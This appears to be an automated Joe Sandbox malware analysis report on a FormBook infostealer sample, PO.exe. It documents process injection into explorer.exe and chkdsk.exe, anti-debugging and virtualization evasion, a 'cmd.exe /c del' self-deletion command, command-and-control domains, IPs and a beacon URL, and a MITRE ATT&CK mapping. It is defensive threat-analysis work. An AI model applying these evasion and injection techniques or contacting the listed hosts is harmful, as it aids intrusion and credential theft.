          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]1_2_009EC600
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]1_2_009EC600
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A18E00 mov eax, dword ptr fs:[00000030h]1_2_00A18E00
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1608 mov eax, dword ptr fs:[00000030h]1_2_00AA1608
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A61C mov eax, dword ptr fs:[00000030h]1_2_00A1A61C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A61C mov eax, dword ptr fs:[00000030h]1_2_00A1A61C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EE620 mov eax, dword ptr fs:[00000030h]1_2_009EE620
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]1_2_00A0AE73
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]1_2_00A0AE73
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]1_2_00A0AE73
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]1_2_00A0AE73
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0AE73 mov eax, dword ptr fs:[00000030h]1_2_00A0AE73
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]1_2_009F7E41
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]1_2_009F7E41
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]1_2_009F7E41
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]1_2_009F7E41
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]1_2_009F7E41
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F7E41 mov eax, dword ptr fs:[00000030h]1_2_009F7E41
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F766D mov eax, dword ptr fs:[00000030h]1_2_009F766D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F8794 mov eax, dword ptr fs:[00000030h]1_2_009F8794
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]1_2_00A67794
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]1_2_00A67794
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67794 mov eax, dword ptr fs:[00000030h]1_2_00A67794
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A237F5 mov eax, dword ptr fs:[00000030h]1_2_00A237F5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1E730 mov eax, dword ptr fs:[00000030h]1_2_00A1E730
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB070D mov eax, dword ptr fs:[00000030h]1_2_00AB070D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB070D mov eax, dword ptr fs:[00000030h]1_2_00AB070D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A70E mov eax, dword ptr fs:[00000030h]1_2_00A1A70E
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A70E mov eax, dword ptr fs:[00000030h]1_2_00A1A70E
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E4F2E mov eax, dword ptr fs:[00000030h]1_2_009E4F2E
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E4F2E mov eax, dword ptr fs:[00000030h]1_2_009E4F2E
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0F716 mov eax, dword ptr fs:[00000030h]1_2_00A0F716
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FF10 mov eax, dword ptr fs:[00000030h]1_2_00A7FF10
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FF10 mov eax, dword ptr fs:[00000030h]1_2_00A7FF10
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8F6A mov eax, dword ptr fs:[00000030h]1_2_00AB8F6A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FEF40 mov eax, dword ptr fs:[00000030h]1_2_009FEF40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FFF60 mov eax, dword ptr fs:[00000030h]1_2_009FFF60
          Source: C:\Users\user\Desktop\PO.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 199.247.6.20 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ayescarrental.com
          Source: C:\Windows\explorer.exeDomain query: www.riceandginger.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.122 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.deerokoj.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_73CA1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Users\user\Desktop\PO.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.495880776.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery141Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383909 Sample: PO.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.665asilo.com 2->31 33 tourbuzz.net 2->33 35 tour.tourbuzz.net 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 4 other signatures 2->49 11 PO.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\gif000d.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Contains functionality to prevent local Windows debugging 11->65 15 PO.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.deerokoj.com 18->37 39 riceandginger.com 162.241.24.122, 49727, 80 UNIFIEDLAYER-AS-1US United States 18->39 41 3 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 chkdsk.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.exe16%VirustotalBrowse
          PO.exe15%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.PO.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.chkdsk.exe.2a5660.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          8.2.chkdsk.exe.54ef834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.PO.exe.2670000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.PO.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.riceandginger.com/fcn/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tourbuzz.net
          		52.20.218.92
          		truefalse
            		high
            riceandginger.com
            		162.241.24.122
            		truetrue
              		unknown
              www.deerokoj.com
              		199.247.6.20
              		truetrue
                		unknown
                www.665asilo.com
                		unknown
                		unknowntrue
                  		unknown
                  www.ayescarrental.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.riceandginger.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVrtrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.riceandginger.com/fcn/true
                      • Avira URL Cloud: safe
                      		low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          199.247.6.20
                                          		www.deerokoj.comEuropean Union
                                          		20473AS-CHOOPAUStrue
                                          162.241.24.122
                                          		riceandginger.comUnited States
                                          		46606UNIFIEDLAYER-AS-1UStrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:383909
                                          Start date:08.04.2021
                                          Start time:12:11:21
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:PO.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:28
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/3@4/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 13.4% (good quality ratio 12.7%)
                                          • Quality average: 77.3%
                                          • Quality standard deviation: 28.2%
                                          HCA Information:
                                          • Successful, ratio: 91%
                                          • Number of executed functions: 68
                                          • Number of non-executed functions: 61
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 23.54.113.53, 13.88.21.125, 168.61.161.212, 95.100.54.203, 20.82.210.154, 23.0.174.185, 23.0.174.200, 23.10.249.43, 23.10.249.26, 20.54.26.129
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          162.241.24.122TRANSFER CONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                          • www.riceandginger.com/fcn/?nR-lCh=-ZkPgF4h0LuP&Bj4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwqJ/jNzuESGN

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          tourbuzz.netTT COPY.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          h3dFAROdF3.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          kqwqyoFz1C.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          BsR85tOyjL.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          PURCHASE_ORDER.xlsxGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          zISJXAAewo.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          tDuLlLosre.exeGet hashmaliciousBrowse
                                          • 52.20.218.92

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          UNIFIEDLAYER-AS-1US0BAdCQQVtP.exeGet hashmaliciousBrowse
                                          • 74.220.199.6
                                          TazxfJHRhq.exeGet hashmaliciousBrowse
                                          • 192.185.48.194
                                          vbc.exeGet hashmaliciousBrowse
                                          • 50.87.195.61
                                          PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                          • 192.185.164.148
                                          PaymentAdvice.exeGet hashmaliciousBrowse
                                          • 198.57.149.44
                                          PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                          • 162.241.61.249
                                          Aveo 742.htmlGet hashmaliciousBrowse
                                          • 162.241.124.93
                                          Bridgestone 363.htmlGet hashmaliciousBrowse
                                          • 162.241.124.93
                                          nunu.exeGet hashmaliciousBrowse
                                          • 192.185.162.134
                                          GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                                          • 192.185.90.36
